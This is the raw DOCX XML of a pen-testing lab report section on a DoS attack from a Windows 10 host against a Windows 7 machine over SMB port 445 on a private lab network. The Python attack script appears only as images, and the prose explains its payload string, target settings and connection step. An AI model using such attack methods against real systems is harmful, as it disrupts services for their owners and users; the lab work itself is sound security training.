        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655172A" w14:textId="14E40024" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2488CB82" w14:textId="2103B6CC" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EADADEE" w14:textId="653A9A14" w:rsidR="38C00A6D" w:rsidRDefault="38C00A6D" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack </w:t>
      </w:r>
      <w:r w:rsidR="1E809806" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows 7 from Windows 10</w:t>
      </w:r>
      <w:r w:rsidR="4A166C0A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>: Do</w:t>
      </w:r>
      <w:r w:rsidR="0AAA103A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="4A166C0A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0831CE7C" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TCP Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557109C8" w14:textId="4E12E3CF" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D35CF8B" w14:textId="499218CB" w:rsidR="1E809806" w:rsidRDefault="1E809806" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Windows 10 address 192.168.169.75</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A6A496" w14:textId="24264A36" w:rsidR="1E809806" w:rsidRDefault="1E809806" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Windows 7 address 192.168.169.110</w:t>
      </w:r>
      <w:r w:rsidR="5ACA47ED" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Port:445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CBCE5" w14:textId="3E5D3BE2" w:rsidR="0D7331C8" w:rsidRDefault="0D7331C8" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Tester</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Francisco</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5D0AB" w14:textId="151DACFE" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68CBF42C" w14:textId="48BE96A1" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E201076" w14:textId="41388C65" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4243BAFE" w14:textId="26BA9B83" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In the previous lab, we discovered 3 ports were opened and the</w:t>
      </w:r>
      <w:r w:rsidR="47F3BBB3" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> are SMB vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1AD02D" w14:textId="40ADBA0C" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Right now</w:t>
      </w:r>
      <w:r w:rsidR="71B84101" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> we are going to exploit the target with </w:t>
      </w:r>
      <w:r w:rsidR="1EE51B29" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="077F0751" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="6B48B77C" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S attack</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> via port 445</w:t>
      </w:r>
      <w:r w:rsidR="272FAE16" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A120BBF" w14:textId="367E705C" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACDE8F5" w14:textId="1218C4D2" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22CC2AB8" wp14:editId="297915FE">
            <wp:extent cx="4572000" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1815861648" name="Picture 181586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28221C44" w14:textId="0809BE9F" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF892CA" w14:textId="5DFEB45F" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0390BCD7" wp14:editId="121A0037">
            <wp:extent cx="8467725" cy="996692"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="938473093" name="Picture 93847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8467725" cy="996692"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="164DA0D1" w14:textId="4AFEC118" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09530EA8" w14:textId="1CA19D0B" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D9D8AB" w14:textId="0D136AE4" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608827ED" w14:textId="7D76FEC8" w:rsidR="600EFEA1" w:rsidRDefault="600EFEA1" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This script </w:t>
      </w:r>
      <w:r w:rsidR="5D34C90A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>uses</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="1756AA52" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">SMB </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">payload to perform </w:t>
      </w:r>
      <w:r w:rsidR="0CF16B02" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Dos attack </w:t>
      </w:r>
      <w:r w:rsidR="3295923D" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">towards </w:t>
      </w:r>
      <w:r w:rsidR="077DCF6A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r w:rsidR="6C984542" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>port 445</w:t>
      </w:r>
      <w:r w:rsidR="0A3D15E1" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B032881" w14:textId="41260F34" w:rsidR="0A3D15E1" w:rsidRDefault="0A3D15E1" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*Pen tester can add more data payload to perform more intense Do</w:t>
      </w:r>
      <w:r w:rsidR="16311B16" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="5D34F0AC" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, as seen below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27882847" w14:textId="47DC73D4" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA99763" w14:textId="24E7B1CB" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="241B18DA" wp14:editId="7B8235CB">
            <wp:extent cx="5067300" cy="4381103"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1533852418" name="Picture 153385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67300" cy="4381103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DD11E" w14:textId="6101B4C3" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D5A6EE" w14:textId="5A1D0B13" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F3DC8F" w14:textId="2F79C607" w:rsidR="412CC434" w:rsidRDefault="412CC434" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Sock</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> data string will be the payload to perform Do</w:t>
      </w:r>
      <w:r w:rsidR="320934C9" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, and we have set up the target Ip and target port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726DA976" w14:textId="6198E21E" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7906F801" w14:textId="3A6EA619" w:rsidR="125D97DE" w:rsidRDefault="125D97DE" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A2CEF4" wp14:editId="186080EC">
            <wp:extent cx="4674358" cy="1552575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1603917121" name="Picture 1603917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74358" cy="1552575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5672442E" w14:textId="1583D978" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4703DD03" w14:textId="3BFBA7A3" w:rsidR="125D97DE" w:rsidRDefault="125D97DE" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">sock.connect </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to verify connection with the target </w:t>
      </w:r>
      <w:r w:rsidR="28DEF8BA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and target port</w:t>
      </w:r>
    </w:p>
